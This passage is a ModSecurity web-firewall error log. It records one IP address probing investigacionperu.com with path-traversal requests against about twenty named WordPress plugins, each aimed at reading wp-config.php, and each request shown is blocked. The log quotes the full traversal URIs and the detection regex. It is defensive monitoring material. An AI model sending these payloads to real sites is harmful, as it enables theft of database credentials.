"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZEeejl4G6tVEc6w5Us7gfwAAAMw"] [Tue Apr 25 04:34:06.783815 2023] [:error] [pid 15580:tid 140447066334976] [client 37.120.213.169:41492] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ibs-mappro/lib/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ibs-mappro/lib/download.php"] [unique_id "ZEeejt-GjcOLRjW9Sa4WCQAAAIs"] [Tue Apr 25 04:34:06.910163 2023] [:error] [pid 15580:tid 140447228344064] [client 37.120.213.169:41494] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/image-export/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/image-export/download.php"] [unique_id "ZEeejt-GjcOLRjW9Sa4WCgAAAIA"] [Tue Apr 25 04:34:07.036533 2023] [:error] [pid 15889:tid 140446990800640] [client 37.120.213.169:41496] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "ZEeej14G6tVEc6w5Us7ggAAAANQ"] [Tue Apr 25 04:34:07.166289 2023] [:error] [pid 15578:tid 140447007586048] [client 37.120.213.169:41498] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jquery-mega-menu/skin.php"] [unique_id "ZEeejz754oNYNW-15_AYbQAAABI"] [Tue Apr 25 04:34:07.301388 2023] [:error] [pid 15579:tid 140447108298496] [client 37.120.213.169:41500] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/justified-image-grid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/justified-image-grid/download.php"] [unique_id "ZEeejyIlOCjnXl5KlpegawAAAEY"] [Tue Apr 25 04:34:07.428089 2023] [:error] [pid 15578:tid 140446974015232] [client 37.120.213.169:41502] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=..%2F..%2F..%2Fwp-config.php&action=asdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/livesig/livesig-ajax-backend.php"] [unique_id "ZEeejz754oNYNW-15_AYbgAAABY"] [Tue Apr 25 04:34:07.553635 2023] [:error] [pid 15578:tid 140446990800640] [client 37.120.213.169:41504] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/localize-my-post/ajax/include.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZEeejz754oNYNW-15_AYbwAAABQ"] [Tue Apr 25 04:34:07.679530 2023] [:error] [pid 15579:tid 140447211558656] [client 37.120.213.169:41506] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-photo-gallery/macdownload.php"] [unique_id "ZEeejyIlOCjnXl5KlpegbAAAAEI"] [Tue Apr 25 04:34:07.809682 2023] [:error] [pid 15889:tid 140447099905792] [client 37.120.213.169:41508] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZEeej14G6tVEc6w5Us7ggQAAAMc"] [Tue Apr 25 04:34:07.936489 2023] [:error] [pid 15579:tid 140447228344064] [client 37.120.213.169:41510] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mailz/lists/config/config.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mailz/lists/config/config.php"] [unique_id "ZEeejyIlOCjnXl5KlpegbQAAAEA"] [Tue Apr 25 04:34:08.062215 2023] [:error] [pid 15579:tid 140446982407936] [client 37.120.213.169:41512] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id "ZEeekCIlOCjnXl5KlpegbgAAAFU"] [Tue Apr 25 04:34:08.187446 2023] [:error] [pid 15579:tid 140447057942272] [client 37.120.213.169:41516] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"] [unique_id "ZEeekCIlOCjnXl5KlpegcAAAAEw"] [Tue Apr 25 04:34:08.312770 2023] [:error] [pid 15579:tid 140446999193344] [client 37.120.213.169:41518] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/myflash/myflash-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/myflash/myflash-button.php"] [unique_id "ZEeekCIlOCjnXl5KlpegcQAAAFM"] [Tue Apr 25 04:34:08.440109 2023] [:error] [pid 15579:tid 140446974015232] [client 37.120.213.169:41520] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php"] [unique_id "ZEeekCIlOCjnXl5KlpegcgAAAFY"] [Tue Apr 25 04:34:08.566303 2023] [:error] [pid 15580:tid 140447015978752] [client 37.120.213.169:41522] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/old-post-spinner/logview.php"] [unique_id "ZEeekN-GjcOLRjW9Sa4WCwAAAJE"] [Tue Apr 25 04:34:08.692301 2023] [:error] [pid 15889:tid 140446974015232] [client 37.120.213.169:41524] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/page-flip-image-gallery/books/getConfig.php"] [unique_id "ZEeekF4G6tVEc6w5Us7gggAAANY"] [Tue Apr 25 04:34:08.822630 2023] [:error] [pid 15580:tid 140447007586048] [client 37.120.213.169:41526] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/photocart-link/decode.php?id=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/photocart-link/decode.php"] [unique_id "ZEeekN-GjcOLRjW9Sa4WDAAAAJI"] [Tue Apr 25 04:34:08.948364 2023] [:error] [pid 15579:tid 140447024371456] [client 37.120.213.169:41528] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pica-photo-gallery/picadownload.php"] [unique_id "ZEeekCIlOCjnXl5KlpegcwAAAFA"] [Tue Apr 25 04:34:09.074022 2023] [:error] [pid 15889:tid 140447219951360] [client 37.120.213.169:41530] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pictpress/resize.php?size=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pictpress/resize.php"] [unique_id "ZEeekV4G6tVEc6w5Us7ggwAAAME"] [Tue Apr 25 04:34:09.200150 2023] [:error] [pid 15889:tid 140447032764160] [client 37.120.213.169:41532] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "ZEeekV4G6tVEc6w5Us7ghAAAAM8"] [Tue Apr 25 04:34:09.326361 2023] [:error] [pid 15889:tid 140447228344064] [client 37.120.213.169:41534] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php"] [unique_id "ZEeekV4G6tVEc6w5Us7ghQAAAMA"] [Tue Apr 25 04:34:09.452634 2023] [:error] [pid 15580:tid 140446999193344] [client 37.120.213.169:41536] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag 